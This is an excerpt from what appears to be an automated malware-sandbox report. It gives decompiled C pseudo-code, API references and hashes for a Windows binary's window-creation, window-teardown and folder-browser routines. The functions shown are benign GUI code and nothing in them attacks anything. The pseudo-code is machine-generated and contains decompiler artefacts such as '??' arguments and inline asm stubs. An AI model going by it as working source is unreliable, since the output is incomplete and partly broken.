                                                                                                                                                  • Instruction ID: 205061af9d75e53c44399c3ed0056efb24790ccb844f4c24922cd61c836d760d
                                                                                                                                                  • Opcode Fuzzy Hash: 63a5c3357b4a5747b66d9db94d4487f7d6bcd7bda56f759a115c6535e61ab02f
                                                                                                                                                  • Instruction Fuzzy Hash: 38C1A071A10A0ABFDB10AF60CD88ABB7B75FB04340F50453BF505A66D0D779A8A1CF99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E00404B03(void* __edx, void* __eflags, struct HWND__** _a4, int _a8, signed int _a12, int _a16, int _a20, CHAR* _a24, long _a28, struct HWND__* _a32) {
                                                                                                                                                  				struct tagRECT _v20;
                                                                                                                                                  				long _v24;
                                                                                                                                                  				struct _WNDCLASSA _v64;
                                                                                                                                                  				char _v320;
                                                                                                                                                  				struct HWND__** _t107;
                                                                                                                                                  				struct HINSTANCE__* _t112;
                                                                                                                                                  				intOrPtr _t113;
                                                                                                                                                  				intOrPtr _t114;
                                                                                                                                                  				struct HWND__* _t130;
                                                                                                                                                  				struct HWND__* _t136;
                                                                                                                                                  				struct HWND__* _t142;
                                                                                                                                                  				struct HWND__** _t143;
                                                                                                                                                  				struct HWND__* _t146;
                                                                                                                                                  				signed int _t157;
                                                                                                                                                  				int _t158;
                                                                                                                                                  				int _t161;
                                                                                                                                                  				signed int _t165;
                                                                                                                                                  				signed int _t166;
                                                                                                                                                  				long _t167;
                                                                                                                                                  				void* _t175;
                                                                                                                                                  				int _t177;
                                                                                                                                                  				struct HWND__** _t182;
                                                                                                                                                  
                                                                                                                                                  				_t175 = __edx;
                                                                                                                                                  				_v24 = 1;
                                                                                                                                                  				_t107 = E0040662C( *0x40b42c, _a4);
                                                                                                                                                  				_t182 = _t107;
                                                                                                                                                  				if(_a4 != 0xffffffff) {
                                                                                                                                                  					L3:
                                                                                                                                                  					_push(_a4);
                                                                                                                                                  					L4:
                                                                                                                                                  					sprintf( &_v320, "WindowClass_%d");
                                                                                                                                                  					if(_a24 == 0) {
                                                                                                                                                  						_a24 = 0x409000;
                                                                                                                                                  					}
                                                                                                                                                  					memset( &_v64, 0, 0x28);
                                                                                                                                                  					_t112 =  *0x40b0fc; // 0x400000
                                                                                                                                                  					_v64.hInstance = _t112;
                                                                                                                                                  					_t113 =  *0x40b434; // 0x0
                                                                                                                                                  					_v64.hIcon = _t113;
                                                                                                                                                  					_t114 =  *0x40b438; // 0x10003
                                                                                                                                                  					_v64.hCursor = _t114;
                                                                                                                                                  					_v64.lpszClassName =  &_v320;
                                                                                                                                                  					_v64.style = 8;
                                                                                                                                                  					_v64.lpfnWndProc = E00405B1F;
                                                                                                                                                  					_v64.cbWndExtra = 0;
                                                                                                                                                  					_v64.hbrBackground = 0x10;
                                                                                                                                                  					RegisterClassA( &_v64);
                                                                                                                                                  					_t165 = _a28;
                                                                                                                                                  					if((_t165 & 0x00000008) != 0) {
                                                                                                                                                  						_v24 = 0;
                                                                                                                                                  					}
                                                                                                                                                  					_t166 = _t165 & 0xfffffff7;
                                                                                                                                                  					if((_t166 & 0xeffffffc) == 0) {
                                                                                                                                                  						_t166 = _t166 | 0x00c00000;
                                                                                                                                                  					}
                                                                                                                                                  					if((_t166 & 0x10000000) == 0) {
                                                                                                                                                  						_a28 = 1;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t166 = _t166 & 0xefffffff;
                                                                                                                                                  						_a28 = 0;
                                                                                                                                                  					}
                                                                                                                                                  					_v20.right = _a16;
                                                                                                                                                  					_v20.bottom = _a20;
                                                                                                                                                  					_v20.left = 0;
                                                                                                                                                  					_v20.top = 0;
                                                                                                                                                  					AdjustWindowRect( &_v20, _t166 & 0xfffffffc, 0);
                                                                                                                                                  					_t177 = _a8;
                                                                                                                                                  					_a16 = _v20.right - _v20.left;
                                                                                                                                                  					_a20 = _v20.bottom - _v20.top;
                                                                                                                                                  					if(_t177 == 0xffff0001 || _a12 == 0xffff0001) {
                                                                                                                                                  						if((_t166 & 0x00000003) == 0) {
                                                                                                                                                  							_t177 = 0x80000000;
                                                                                                                                                  							_a12 = 0x80000000;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					if((_t166 & 0x00000001) == 0) {
                                                                                                                                                  						if((_t166 & 0x00000002) == 0) {
                                                                                                                                                  							goto L30;
                                                                                                                                                  						}
                                                                                                                                                  						_t146 = _a32;
                                                                                                                                                  						if(_t146 != 0) {
                                                                                                                                                  							L26:
                                                                                                                                                  							GetWindowRect(_t146,  &_v20);
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_t177 = (_v20.right - _v20.left - _a16 - _t175 >> 1) + _v20.left;
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_t157 = (_v20.bottom - _v20.top - _a20 - _t175 >> 1) + _v20.top;
                                                                                                                                                  							_a12 = _t157;
                                                                                                                                                  							if(_t177 < 0) {
                                                                                                                                                  								_t177 = 0;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t157 < 0) {
                                                                                                                                                  								_a12 = _a12 & 0x00000000;
                                                                                                                                                  							}
                                                                                                                                                  							goto L30;
                                                                                                                                                  						}
                                                                                                                                                  						_t146 = GetActiveWindow();
                                                                                                                                                  						if(_t146 == 0) {
                                                                                                                                                  							goto L30;
                                                                                                                                                  						}
                                                                                                                                                  						goto L26;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t158 = GetSystemMetrics(0);
                                                                                                                                                  						if(_a16 > _t158) {
                                                                                                                                                  							_a16 = _t158;
                                                                                                                                                  						}
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						_t177 = _t158 - _a16 - _t175 >> 1;
                                                                                                                                                  						_t161 = GetSystemMetrics(1);
                                                                                                                                                  						if(_a20 > _t161) {
                                                                                                                                                  							_a20 = _t161;
                                                                                                                                                  						}
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						_a12 = _t161 - _a20 - _t175 >> 1;
                                                                                                                                                  						L30:
                                                                                                                                                  						_t167 = _t166 & 0xfffffffc;
                                                                                                                                                  						_t130 = CreateWindowExA(0,  &_v320, _a24, _t167, _t177, _a12, _a16, _a20, _a32, 0,  *0x40b0fc, 0);
                                                                                                                                                  						 *_t182 = _t130;
                                                                                                                                                  						if(_t130 == 0) {
                                                                                                                                                  							UnregisterClassA( &_v320,  *0x40b0fc);
                                                                                                                                                  							E004066BB( *0x40b42c, _a4);
                                                                                                                                                  							return 0;
                                                                                                                                                  						}
                                                                                                                                                  						SetPropA(_t130, "PB_WindowID",  &(_a4[0]));
                                                                                                                                                  						if(_a28 != 0) {
                                                                                                                                                  							if((_t167 & 0x01000000) == 0) {
                                                                                                                                                  								if((_t167 & 0x20000000) == 0) {
                                                                                                                                                  									_push(1);
                                                                                                                                                  								} else {
                                                                                                                                                  									_push(2);
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								_push(3);
                                                                                                                                                  							}
                                                                                                                                                  							ShowWindow( *_t182, ??);
                                                                                                                                                  						}
                                                                                                                                                  						asm("sbb ebx, ebx");
                                                                                                                                                  						_t182[0xb] =  ~( ~(_t167 & 0x21000000));
                                                                                                                                                  						_t182[4] = 2;
                                                                                                                                                  						_t136 = RtlAllocateHeap( *0x40b0f8, 0, 0xc);
                                                                                                                                                  						_t182[1] = _t136;
                                                                                                                                                  						_t136->i = 9;
                                                                                                                                                  						 *((short*)(_t182[1] + 4)) = 0xfa01;
                                                                                                                                                  						 *(_t182[1]) = 3;
                                                                                                                                                  						 *((short*)(_t182[1] + 8)) = 9;
                                                                                                                                                  						 *((short*)(_t182[1] + 0xa)) = 0xfa02;
                                                                                                                                                  						 *((char*)(_t182[1] + 6)) = 7;
                                                                                                                                                  						_t142 = CreateAcceleratorTableA(_t182[1], _t182[4]);
                                                                                                                                                  						_t182[5] = _t182[5] | 0xffffffff;
                                                                                                                                                  						_t182[2] = _t142;
                                                                                                                                                  						_t182[7] = 0;
                                                                                                                                                  						if(_v24 != 0) {
                                                                                                                                                  							_push( *_t182);
                                                                                                                                                  							L00407EE3();
                                                                                                                                                  						}
                                                                                                                                                  						_t143 = _a4;
                                                                                                                                                  						if(_t143 == _t182) {
                                                                                                                                                  							return _t143;
                                                                                                                                                  						} else {
                                                                                                                                                  							return  *_t182;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_a4 = _t182;
                                                                                                                                                  				if(_t182 != 0xffffffff) {
                                                                                                                                                  					goto L3;
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(_t107);
                                                                                                                                                  					goto L4;
                                                                                                                                                  				}
                                                                                                                                                  			}

























                                                                                                                                                  0x00404b03
                                                                                                                                                  0x00404b12
                                                                                                                                                  0x00404b1f
                                                                                                                                                  0x00404b28
                                                                                                                                                  0x00404b2a
                                                                                                                                                  0x00404b37
                                                                                                                                                  0x00404b37
                                                                                                                                                  0x00404b3a
                                                                                                                                                  0x00404b46
                                                                                                                                                  0x00404b53
                                                                                                                                                  0x00404b55
                                                                                                                                                  0x00404b55
                                                                                                                                                  0x00404b63
                                                                                                                                                  0x00404b68
                                                                                                                                                  0x00404b6d
                                                                                                                                                  0x00404b70
                                                                                                                                                  0x00404b75
                                                                                                                                                  0x00404b78
                                                                                                                                                  0x00404b7d
                                                                                                                                                  0x00404b86
                                                                                                                                                  0x00404b90
                                                                                                                                                  0x00404b97
                                                                                                                                                  0x00404b9e
                                                                                                                                                  0x00404ba1
                                                                                                                                                  0x00404ba8
                                                                                                                                                  0x00404bae
                                                                                                                                                  0x00404bb4
                                                                                                                                                  0x00404bb6
                                                                                                                                                  0x00404bb6
                                                                                                                                                  0x00404bb9
                                                                                                                                                  0x00404bc2
                                                                                                                                                  0x00404bc4
                                                                                                                                                  0x00404bc4
                                                                                                                                                  0x00404bd0
                                                                                                                                                  0x00404bdd
                                                                                                                                                  0x00404bd2
                                                                                                                                                  0x00404bd2
                                                                                                                                                  0x00404bd8
                                                                                                                                                  0x00404bd8
                                                                                                                                                  0x00404be7
                                                                                                                                                  0x00404bed
                                                                                                                                                  0x00404bfb
                                                                                                                                                  0x00404bfe
                                                                                                                                                  0x00404c01
                                                                                                                                                  0x00404c0d
                                                                                                                                                  0x00404c10
                                                                                                                                                  0x00404c19
                                                                                                                                                  0x00404c23
                                                                                                                                                  0x00404c2d
                                                                                                                                                  0x00404c2f
                                                                                                                                                  0x00404c34
                                                                                                                                                  0x00404c34
                                                                                                                                                  0x00404c2d
                                                                                                                                                  0x00404c3a
                                                                                                                                                  0x00404c76
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404c78
                                                                                                                                                  0x00404c7d
                                                                                                                                                  0x00404c89
                                                                                                                                                  0x00404c8e
                                                                                                                                                  0x00404c9d
                                                                                                                                                  0x00404cad
                                                                                                                                                  0x00404cb0
                                                                                                                                                  0x00404cb5
                                                                                                                                                  0x00404cba
                                                                                                                                                  0x00404cbd
                                                                                                                                                  0x00404cbf
                                                                                                                                                  0x00404cbf
                                                                                                                                                  0x00404cc3
                                                                                                                                                  0x00404cc5
                                                                                                                                                  0x00404cc5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404cc3
                                                                                                                                                  0x00404c7f
                                                                                                                                                  0x00404c87
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404c3c
                                                                                                                                                  0x00404c3e
                                                                                                                                                  0x00404c47
                                                                                                                                                  0x00404c49
                                                                                                                                                  0x00404c49
                                                                                                                                                  0x00404c51
                                                                                                                                                  0x00404c56
                                                                                                                                                  0x00404c58
                                                                                                                                                  0x00404c61
                                                                                                                                                  0x00404c63
                                                                                                                                                  0x00404c63
                                                                                                                                                  0x00404c69
                                                                                                                                                  0x00404c6e
                                                                                                                                                  0x00404cc9
                                                                                                                                                  0x00404cd2
                                                                                                                                                  0x00404cef
                                                                                                                                                  0x00404cf9
                                                                                                                                                  0x00404cfb
                                                                                                                                                  0x00404dc9
                                                                                                                                                  0x00404dd8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404ddd
                                                                                                                                                  0x00404d0c
                                                                                                                                                  0x00404d15
                                                                                                                                                  0x00404d1d
                                                                                                                                                  0x00404d29
                                                                                                                                                  0x00404d2f
                                                                                                                                                  0x00404d2b
                                                                                                                                                  0x00404d2b
                                                                                                                                                  0x00404d2b
                                                                                                                                                  0x00404d1f
                                                                                                                                                  0x00404d1f
                                                                                                                                                  0x00404d1f
                                                                                                                                                  0x00404d33
                                                                                                                                                  0x00404d33
                                                                                                                                                  0x00404d41
                                                                                                                                                  0x00404d48
                                                                                                                                                  0x00404d4b
                                                                                                                                                  0x00404d58
                                                                                                                                                  0x00404d5e
                                                                                                                                                  0x00404d61
                                                                                                                                                  0x00404d6a
                                                                                                                                                  0x00404d73
                                                                                                                                                  0x00404d79
                                                                                                                                                  0x00404d82
                                                                                                                                                  0x00404d8b
                                                                                                                                                  0x00404d95
                                                                                                                                                  0x00404d9b
                                                                                                                                                  0x00404da2
                                                                                                                                                  0x00404da5
                                                                                                                                                  0x00404da8
                                                                                                                                                  0x00404daa
                                                                                                                                                  0x00404dac
                                                                                                                                                  0x00404dac
                                                                                                                                                  0x00404db1
                                                                                                                                                  0x00404db6
                                                                                                                                                  0x00404de3
                                                                                                                                                  0x00404db8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404db8
                                                                                                                                                  0x00404db6
                                                                                                                                                  0x00404c3a
                                                                                                                                                  0x00404b2f
                                                                                                                                                  0x00404b32
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404b34
                                                                                                                                                  0x00404b34
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404b34

                                                                                                                                                  APIs
                                                                                                                                                  • sprintf.MSVCRT ref: 00404B46
                                                                                                                                                  • memset.MSVCRT ref: 00404B63
                                                                                                                                                  • RegisterClassA.USER32(?), ref: 00404BA8
                                                                                                                                                  • AdjustWindowRect.USER32(?,00000010,00000000), ref: 00404C01
                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 00404C3E
                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 00404C58
                                                                                                                                                  • GetActiveWindow.USER32 ref: 00404C7F
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00404C8E
                                                                                                                                                  • CreateWindowExA.USER32(00000000,?,?,00000010,?,?,00000001,?,?,00000000,00000000), ref: 00404CEF
                                                                                                                                                  • SetPropA.USER32(00000000,PB_WindowID,00000100), ref: 00404D0C
                                                                                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00404D33
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00404D58
                                                                                                                                                  • CreateAcceleratorTableA.USER32(?,?), ref: 00404D95
                                                                                                                                                  • UnregisterClassA.USER32(?), ref: 00404DC9
                                                                                                                                                    • Part of subcall function 004066BB: memset.MSVCRT ref: 004066D8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ClassCreateMetricsRectSystemmemset$AcceleratorActiveAdjustAllocateHeapPropRegisterShowTableUnregistersprintf
                                                                                                                                                  • String ID: PB_WindowID$WindowClass_%d
                                                                                                                                                  • API String ID: 1820370190-2937193648
                                                                                                                                                  • Opcode ID: 063ace8527f72d1ec566d245578ff32e7f27e017082b94de6c0a8473836dc150
                                                                                                                                                  • Instruction ID: 28adbf0df4d083847e84d8171d787dae0ee48a8b621b34b8ec1d13c8ba578f25
                                                                                                                                                  • Opcode Fuzzy Hash: 063ace8527f72d1ec566d245578ff32e7f27e017082b94de6c0a8473836dc150
                                                                                                                                                  • Instruction Fuzzy Hash: 3CA17AB190020ADFDB10CF69D989B9EBBF4FF44344F14862AF954A32A0D778D950CB99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E00404925(void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				char _v260;
                                                                                                                                                  				int* _t11;
                                                                                                                                                  				struct HWND__* _t12;
                                                                                                                                                  				struct HWND__* _t15;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				int* _t32;
                                                                                                                                                  				void* _t33;
                                                                                                                                                  
                                                                                                                                                  				_t29 = __edi;
                                                                                                                                                  				_t11 = E00406690( *0x40b42c, _a4);
                                                                                                                                                  				_t32 = _t11;
                                                                                                                                                  				if(_t32 != 0) {
                                                                                                                                                  					_t12 = GetWindow( *_t32, 4);
                                                                                                                                                  					if(_t12 != 0 && _t32[7] == 0) {
                                                                                                                                                  						SetActiveWindow(_t12);
                                                                                                                                                  					}
                                                                                                                                                  					_push(_t29);
                                                                                                                                                  					RemovePropA( *_t32, "PB_WindowID");
                                                                                                                                                  					if(RemovePropA( *_t32, "PB_DropAccept") != 0) {
                                                                                                                                                  						 *0x40a878( *_t32);
                                                                                                                                                  					}
                                                                                                                                                  					_t15 = _t32[7];
                                                                                                                                                  					if(_t15 == 0) {
                                                                                                                                                  						DestroyWindow( *_t32);
                                                                                                                                                  						sprintf( &_v260, "WindowClass_%d", _a4);
                                                                                                                                                  						UnregisterClassA( &_v260,  *0x40b0fc);
                                                                                                                                                  					} else {
                                                                                                                                                  						SendMessageA(_t15, 0x221,  *_t32, 0);
                                                                                                                                                  					}
                                                                                                                                                  					_t21 = _t32[1];
                                                                                                                                                  					if(_t21 != 0) {
                                                                                                                                                  						HeapFree( *0x40b0f8, 0, _t21);
                                                                                                                                                  						DestroyAcceleratorTable(_t32[2]);
                                                                                                                                                  					}
                                                                                                                                                  					_t33 = _t32[6];
                                                                                                                                                  					if(_t33 != 0) {
                                                                                                                                                  						DeleteObject(_t33);
                                                                                                                                                  					}
                                                                                                                                                  					return E004066BB( *0x40b42c, _a4);
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}











                                                                                                                                                  0x00404925
                                                                                                                                                  0x00404938
                                                                                                                                                  0x0040493d
                                                                                                                                                  0x00404941
                                                                                                                                                  0x0040494b
                                                                                                                                                  0x00404953
                                                                                                                                                  0x0040495c
                                                                                                                                                  0x0040495c
                                                                                                                                                  0x00404962
                                                                                                                                                  0x00404970
                                                                                                                                                  0x0040497e
                                                                                                                                                  0x00404982
                                                                                                                                                  0x00404982
                                                                                                                                                  0x00404988
                                                                                                                                                  0x0040498d
                                                                                                                                                  0x004049a3
                                                                                                                                                  0x004049b8
                                                                                                                                                  0x004049cd
                                                                                                                                                  0x0040498f
                                                                                                                                                  0x00404999
                                                                                                                                                  0x00404999
                                                                                                                                                  0x004049d3
                                                                                                                                                  0x004049d8
                                                                                                                                                  0x004049e3
                                                                                                                                                  0x004049ec
                                                                                                                                                  0x004049ec
                                                                                                                                                  0x004049f2
                                                                                                                                                  0x004049f7
                                                                                                                                                  0x004049fa
                                                                                                                                                  0x004049fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404a09
                                                                                                                                                  0x00404a10

                                                                                                                                                  APIs
                                                                                                                                                  • GetWindow.USER32(00000000,00000004), ref: 0040494B
                                                                                                                                                  • SetActiveWindow.USER32(00000000), ref: 0040495C
                                                                                                                                                  • RemovePropA.USER32(00000000,PB_WindowID), ref: 00404970
                                                                                                                                                  • RemovePropA.USER32(00000000,PB_DropAccept), ref: 00404979
                                                                                                                                                  • RevokeDragDrop.OLE32(00000000), ref: 00404982
                                                                                                                                                  • SendMessageA.USER32(?,00000221,00000000,00000000), ref: 00404999
                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 004049A3
                                                                                                                                                  • sprintf.MSVCRT ref: 004049B8
                                                                                                                                                  • UnregisterClassA.USER32(?), ref: 004049CD
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 004049E3
                                                                                                                                                  • DestroyAcceleratorTable.USER32(?), ref: 004049EC
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004049FA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$DestroyPropRemove$AcceleratorActiveClassDeleteDragDropFreeHeapMessageObjectRevokeSendTableUnregistersprintf
                                                                                                                                                  • String ID: PB_DropAccept$PB_WindowID$WindowClass_%d
                                                                                                                                                  • API String ID: 3116416752-976223216
                                                                                                                                                  • Opcode ID: 884db38a7d1111d9f10292c509c9a9f5fdc1eb4f4251496c9c73458246e950c8
                                                                                                                                                  • Instruction ID: 76adc180981eb15cd37713a9aaa1cc34ae54204bacec3ed2c8797916cc70c0fb
                                                                                                                                                  • Opcode Fuzzy Hash: 884db38a7d1111d9f10292c509c9a9f5fdc1eb4f4251496c9c73458246e950c8
                                                                                                                                                  • Instruction Fuzzy Hash: CC214CB1500305EBDB216F71ED09F5B7BB9EB44740F148439FA41B21A0C736D8659B9D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E004036F8(void* __ecx, void* __esi, intOrPtr _a4, _Unknown_base(*)()* _a8, intOrPtr _a12) {
                                                                                                                                                  				struct HINSTANCE__* _v8;
                                                                                                                                                  				char* _v16;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				void _v40;
                                                                                                                                                  				int _v41;
                                                                                                                                                  				char _v300;
                                                                                                                                                  				struct HINSTANCE__* _t35;
                                                                                                                                                  				int _t41;
                                                                                                                                                  				_Unknown_base(*)()* _t51;
                                                                                                                                                  				char* _t56;
                                                                                                                                                  				int* _t57;
                                                                                                                                                  				int _t59;
                                                                                                                                                  				void* _t61;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				char* _t68;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				void* _t73;
                                                                                                                                                  
                                                                                                                                                  				_t65 = __esi;
                                                                                                                                                  				_t61 = __ecx;
                                                                                                                                                  				_t59 = 0;
                                                                                                                                                  				_t73 =  *0x40b1bc - _t59; // 0x0
                                                                                                                                                  				if(_t73 == 0) {
                                                                                                                                                  					 *0x40b1bc = 1;
                                                                                                                                                  					 *0x40a870(0);
                                                                                                                                                  				}
                                                                                                                                                  				memset( &_v40, _t59, 0x20);
                                                                                                                                                  				_t35 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                  				_v8 = _t35;
                                                                                                                                                  				if(_t35 == _t59) {
                                                                                                                                                  					L12:
                                                                                                                                                  					 *(E00407750(0x104, _a12)) = 0;
                                                                                                                                                  					L13:
                                                                                                                                                  					return E004077F0(0x104 - _t59);
                                                                                                                                                  				}
                                                                                                                                                  				if(_a8 == _t59) {
                                                                                                                                                  					_a8 = 0x409000;
                                                                                                                                                  				}
                                                                                                                                                  				strncpy( &_v300, _a8, 0x103);
                                                                                                                                                  				_v41 = _t59;
                                                                                                                                                  				_t41 = strlen( &_v300);
                                                                                                                                                  				if(_t41 > 3) {
                                                                                                                                                  					_t57 = _t69 + _t41 - 0x129;
                                                                                                                                                  					if( *_t57 == 0x5c) {
                                                                                                                                                  						 *_t57 = _t59;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_a8 = GetProcAddress(_v8, "SHBrowseForFolder");
                                                                                                                                                  				_v28 = _a4;
                                                                                                                                                  				_v40 = E0040390D(_t61);
                                                                                                                                                  				_v24 = 0x40;
                                                                                                                                                  				_v20 = E004036D1;
                                                                                                                                                  				_v16 =  &_v300;
                                                                                                                                                  				E004038B5(1);
                                                                                                                                                  				_a8 = _a8( &_v40, _t65);
                                                                                                                                                  				E004038B5(0);
                                                                                                                                                  				if(_a8 != _t59) {
                                                                                                                                                  					_t51 = GetProcAddress(_v8, "SHGetPathFromIDList");
                                                                                                                                                  					_t68 = E00407750(0x104, _a12);
                                                                                                                                                  					 *_t68 = 0;
                                                                                                                                                  					 *_t51(_a8, _t68);
                                                                                                                                                  					 *0x40a874(_a8);
                                                                                                                                                  					_t59 = strlen(_t68);
                                                                                                                                                  					_t56 =  &(_t68[_t59]);
                                                                                                                                                  					if( *((char*)(_t56 - 1)) != 0x5c) {
                                                                                                                                                  						 *_t56 = 0x5c;
                                                                                                                                                  						_t56[1] = 0;
                                                                                                                                                  						_t59 = _t59 + 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				FreeLibrary(_v8);
                                                                                                                                                  				if(_t59 != 0) {
                                                                                                                                                  					goto L13;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L12;
                                                                                                                                                  				}
                                                                                                                                                  			}






















                                                                                                                                                  0x004036f8
                                                                                                                                                  0x004036f8
                                                                                                                                                  0x00403702
                                                                                                                                                  0x00403704
                                                                                                                                                  0x0040370b
                                                                                                                                                  0x0040370e
                                                                                                                                                  0x00403718
                                                                                                                                                  0x00403718
                                                                                                                                                  0x00403725
                                                                                                                                                  0x00403732
                                                                                                                                                  0x0040373a
                                                                                                                                                  0x00403742
                                                                                                                                                  0x00403834
                                                                                                                                                  0x0040383d
                                                                                                                                                  0x00403840
                                                                                                                                                  0x0040384b
                                                                                                                                                  0x0040384b
                                                                                                                                                  0x0040374b
                                                                                                                                                  0x0040374d
                                                                                                                                                  0x0040374d
                                                                                                                                                  0x00403763
                                                                                                                                                  0x0040376f
                                                                                                                                                  0x00403772
                                                                                                                                                  0x0040377d
                                                                                                                                                  0x0040377f
                                                                                                                                                  0x00403789
                                                                                                                                                  0x0040378b
                                                                                                                                                  0x0040378b
                                                                                                                                                  0x00403789
                                                                                                                                                  0x0040379e
                                                                                                                                                  0x004037a4
                                                                                                                                                  0x004037ac
                                                                                                                                                  0x004037b7
                                                                                                                                                  0x004037be
                                                                                                                                                  0x004037c5
                                                                                                                                                  0x004037c8
                                                                                                                                                  0x004037d6
                                                                                                                                                  0x004037d9
                                                                                                                                                  0x004037e1
                                                                                                                                                  0x004037eb
                                                                                                                                                  0x004037f8
                                                                                                                                                  0x004037fe
                                                                                                                                                  0x00403801
                                                                                                                                                  0x00403806
                                                                                                                                                  0x00403812
                                                                                                                                                  0x00403814
                                                                                                                                                  0x0040381c
                                                                                                                                                  0x0040381e
                                                                                                                                                  0x00403821
                                                                                                                                                  0x00403825
                                                                                                                                                  0x00403825
                                                                                                                                                  0x0040381c
                                                                                                                                                  0x00403829
                                                                                                                                                  0x00403832
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00403718
                                                                                                                                                  • memset.MSVCRT ref: 00403725
                                                                                                                                                  • LoadLibraryA.KERNEL32(SHELL32.DLL), ref: 00403732
                                                                                                                                                  • strncpy.MSVCRT ref: 00403763
                                                                                                                                                  • strlen.MSVCRT ref: 00403772
                                                                                                                                                  • GetProcAddress.KERNEL32(?,SHBrowseForFolder), ref: 0040379C
                                                                                                                                                  • GetProcAddress.KERNEL32(?,SHGetPathFromIDList), ref: 004037EB
                                                                                                                                                  • strlen.MSVCRT ref: 0040380D
                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000), ref: 00403829
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
